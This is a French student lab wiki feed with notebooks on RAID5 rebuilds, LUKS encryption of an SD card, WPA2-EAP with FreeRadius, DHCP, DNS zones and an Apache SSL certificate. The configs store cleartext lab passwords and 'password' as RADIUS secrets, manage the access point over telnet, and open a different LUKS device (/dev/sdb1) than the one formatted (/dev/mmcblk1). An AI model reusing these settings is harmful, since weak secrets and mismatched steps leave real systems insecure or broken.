    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DCHP ====&lt;br /&gt;
&lt;br /&gt;
Pour cette partie, nous avons d'abord installer le paquet isc-dhcp-server.&lt;br /&gt;
Ensuite, nous avons modifier le fichier dhcpd.conf :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
option domain-name &amp;quot;jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.162;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.3.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.3.10 10.60.3.40;&lt;br /&gt;
      option routers 10.60.3.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite isc-dhcp-server pour rajouter l'interface wlan0 : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
INTERFACES=&amp;quot;wlan0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant nous connecter sur le reseau Wifi via smartphone, le serveur DHCP fonctionne correctement (PHOTO).&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35979</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35979"/>
				<updated>2016-12-13T08:52:54Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Configuration d'un PCBX */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
